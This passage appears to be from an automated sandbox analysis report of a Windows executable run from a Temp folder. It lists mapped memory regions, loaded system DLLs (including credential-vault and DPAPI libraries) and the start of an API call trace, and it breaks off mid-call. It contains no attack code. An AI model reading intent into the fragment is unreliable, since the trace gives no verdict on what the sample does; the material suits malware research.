"c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1648 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1649 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1650 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1651 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1652 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1653 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1654 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1655 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1656 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1658 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1659 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1660 start_va = 0x74d80000 end_va = 0x74e11fff monitored = 0 entry_point = 0x74db8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1661 start_va = 0x840000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1662 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1663 start_va = 0x8f0000 end_va = 0xa77fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 1664 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1665 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1666 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1667 start_va = 0xa80000 end_va = 0xc00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 1668 start_va = 0x1100000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 1669 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1670 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1671 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1672 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1673 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1674 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1675 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1676 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1677 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1680 start_va = 0x70770000 end_va = 0x70782fff monitored = 0 entry_point = 0x70779950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1681 start_va = 0x70740000 end_va = 0x7076efff monitored = 0 entry_point = 0x707595e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1682 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1683 start_va = 0xc10000 end_va = 0xf46fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1689 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1700 start_va = 0x6ce80000 end_va = 0x6ceb9fff monitored = 0 entry_point = 0x6ce99be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 1701 start_va = 0x74490000 end_va = 0x74557fff monitored = 0 entry_point = 0x744fae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 1764 start_va = 0x76ca0000 end_va = 0x76e17fff monitored = 0 entry_point = 0x76cf8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1765 start_va = 0x74e70000 end_va = 0x74e7dfff monitored = 0 entry_point = 0x74e75410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1766 start_va = 0x70790000 end_va = 0x70797fff monitored = 0 entry_point = 0x70791d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1772 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1773 start_va = 0xf50000 end_va = 0xff5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1774 start_va = 0x755e0000 end_va = 0x755f2fff monitored = 0 entry_point = 0x755e1d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 1775 start_va = 0x67df0000 end_va = 0x67e04fff monitored = 0 entry_point = 0x67df5210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 1776 start_va = 0x67dd0000 end_va = 0x67de2fff monitored = 0 entry_point = 0x67dd5c60 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 1777 start_va = 0x70950000 end_va = 0x70968fff monitored = 0 entry_point = 0x709547e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1778 start_va = 0x723a0000 end_va = 0x723eefff monitored = 0 entry_point = 0x723ad850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1779 start_va = 0x722d0000 end_va = 0x72353fff monitored = 0 entry_point = 0x722f6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1780 start_va = 0x749e0000 end_va = 0x749e6fff monitored = 0 entry_point = 0x749e1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1781 start_va = 0x722a0000 end_va = 0x722cefff monitored = 0 entry_point = 0x722abb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1782 start_va = 0x72240000 end_va = 0x72286fff monitored = 0 entry_point = 0x722558d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1786 start_va = 0x72290000 end_va = 0x72297fff monitored = 0 entry_point = 0x72291920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1787 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1790 start_va = 0x6d0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 1791 start_va = 0x840000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1792 start_va = 0x8e0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 1793 start_va = 0xf50000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1794 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1795 start_va = 0x880000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1796 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1800 start_va = 0x880000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1801 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1802 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1803 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1804 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1805 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1810 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1811 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1815 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1816 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1822 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1823 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1827 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1828 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1833 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1834 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1835 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1836 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1838 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1839 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1849 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1850 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1851 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1852 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1853 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1854 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1855 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1856 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1857 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1858 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1859 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1860 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1861 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1862 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1863 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1864 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1866 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1867 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1868 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1869 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1870 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1871 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1872 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1873 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1874 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1875 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1877 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1878 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1879 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1880 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1881 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1882 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1883 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1884 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1885 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1886 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1887 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1888 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1889 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1890 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1891 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1892 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1893 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1894 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1895 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1896 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1897 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1898 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1899 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1900 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1901 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1902 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1903 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1904 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1905 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1906 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1907 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1908 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1909 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1910 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1911 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1912 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1913 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1914 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1915 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1916 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1917 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1918 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1919 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1920 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1921 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1922 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1923 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1924 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1925 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1926 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1927 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1928 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1929 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1930 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1931 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1932 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1933 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1934 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1935 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1936 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1937 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1938 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1939 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1940 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1941 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1942 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1943 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1944 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Thread: id = 61 os_tid = 0x125c [0230.465] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\npotbzd" [0230.466] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0231.060] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xmtxpy.exe 